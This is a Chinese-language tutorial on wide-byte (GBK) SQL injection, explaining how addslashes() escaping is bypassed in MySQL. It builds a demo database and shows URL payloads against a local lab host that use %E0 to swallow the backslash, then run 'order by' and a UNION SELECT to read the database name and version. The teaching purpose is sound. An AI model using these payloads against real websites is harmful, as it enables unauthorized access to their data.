大數(shù)據(jù)中寬字節(jié)注入該怎么理解

這期內(nèi)容當中小編將會給大家?guī)碛嘘P(guān)大數(shù)據(jù)中寬字節(jié)注入該怎么理解，文章內(nèi)容豐富且以專業(yè)的角度為大家分析和敘述，閱讀完這篇文章希望大家可以有所收獲。

一、寬字節(jié)概念

1、單字節(jié)字符集：所有的字符都使用一個字節(jié)來表示，比如 ASCII 編碼(0-127)

2、多字節(jié)字符集：在多字節(jié)字符集中，一部分字節(jié)用多個字節(jié)來表示，另一部分（可能沒有）用單個字節(jié)來表示。

3、寬字節(jié)注入時利用mysql的一個特性，使用GBK編碼的時候，會認為兩個字符是一個漢字

二、addslashes()函數(shù)

1、addslashes() 函數(shù)返回在預(yù)定義字符之前添加反斜杠的字符串。

2、預(yù)定義字符：單引號（'），雙引號（"），反斜杠（\），NULL

3、實例

<?php$ss=addslashes('aiyou"bu"cuoo');echo($ss);?>運行結(jié)果：aiyou\"bu\"cuoo

三、數(shù)據(jù)庫創(chuàng)建

1、創(chuàng)建數(shù)據(jù)庫名為jay

create database jay;

2、選擇創(chuàng)建好的數(shù)據(jù)庫

use jay;

3、創(chuàng)建表名為zhuanji，字段包括，id，neme，year，zhudage

create table zhuanji(id int primary key auto_increment,name varchar(255) not null,year int  not null,zhudage varchar(255) not null);

4、插入數(shù)據(jù)

insert into zhuanji (name,year,zhudage) values ("七里香","2004","七里香/外婆/我的地盤");insert into zhuanji (name,year,zhudage) values ("十一月的蕭邦","2005","夜曲/發(fā)如雪/珊瑚海");insert into zhuanji (name,year,zhudage) values ("我很忙","2007","青花瓷/我不配/彩虹");

5、中文編碼問題，修改my.ini文件

[mysql]

default-character-set=gbk

[mysqld]

character-set-server=gbk

四、寬字節(jié)注入

1、訪問該網(wǎng)址：http://192.168.0.104/aiyou/1.php?id=2，返回正常信息

2、判斷是否存在注入，在id=2后面加入'，看是否報錯，發(fā)現(xiàn)單引號被轉(zhuǎn)義了

3、替換反斜杠，反斜杠的GBK編碼為%5C，根據(jù)GBK編碼在前面加上%DE，%DF，%E0。。。都可以組成一個漢字，從而把反斜杠給‘吃’了

4、成功替換了反斜杠

5、獲取數(shù)據(jù)庫列數(shù)，order by 4返回正常

192.168.0.104/aiyou/1.php?id=2%E0' order by 4 --+

6、獲取數(shù)據(jù)庫名稱及版本號

192.168.0.104/aiyou/1.php?id=-2%E0' union select 1,database(),version(),4 --+

上述就是小編為大家分享的大數(shù)據(jù)中寬字節(jié)注入該怎么理解了，如果剛好有類似的疑惑，不妨參照上述分析進行理解。如果想知道更多相關(guān)知識，歡迎關(guān)注億速云行業(yè)資訊頻道。